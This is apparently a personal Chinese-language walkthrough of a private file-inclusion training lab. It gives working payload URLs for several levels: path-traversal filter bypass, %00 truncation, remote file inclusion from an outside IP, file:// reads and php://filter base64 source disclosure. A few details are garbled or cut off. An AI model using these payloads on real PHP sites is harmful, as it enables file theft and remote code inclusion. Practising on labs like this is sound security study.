DAY15:文件包含漏洞靶场过关手册(自用 file-include 靶场)
Pass-01、基础file
读取
http://172.16.0.193/file-include/01/index.php?file=1.txt
解析 1.txt 内容为 php 格式,phpinfo 解析成功
Pass-03、过滤 …/(路径双写拼接)
使用:
.+ ../ +./ --------当作一个 ../
查看上一目录的 info.txt
Pass-04、%00 截断
需要 php版本小于 5.3.8 以及 magic_quotes_gpc = Off
172.16.0.193/file-include/04/index.php?file=1.txt%00
Pass-05、远程文件包含
php 版本:5.2.17
(1)远程包含文件路径必须为绝对路径
(2)被包含的文件不能够被服务器解析,如php文件
172.16.0.193/file-include/05/index.php?file=http://123.56.226.153/info.txt
Pass-07、file://伪协议
php 版本:5.2.17
(1)file:// — 用于访问本地文件系统
(2)php版本:5.0以上
(3)是 PHP 使用的默认封装协议
(4)当指定了一个相对路径(不以/、\、\\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录
(5)该协议的语法:php://filter:/<action>=<name>
包含文件路径必须为绝对路径
http://172.16.0.193/file-include/07/index.php?file=file:D:\phpStudy\PHPTutorial\WWW\file-include\07\flag.tx
http://172.16.0.193/file-include/07/index.php?file=php://filter/read=convert.base64-
encode/resource=flag.txt
convert.base64-encode:将数据流中的内容转换为base64编码
base64-encode:将数据流中的内容转换为base64编码
[外链图片转存中...(img-s9kVOVKe-1658928781945)]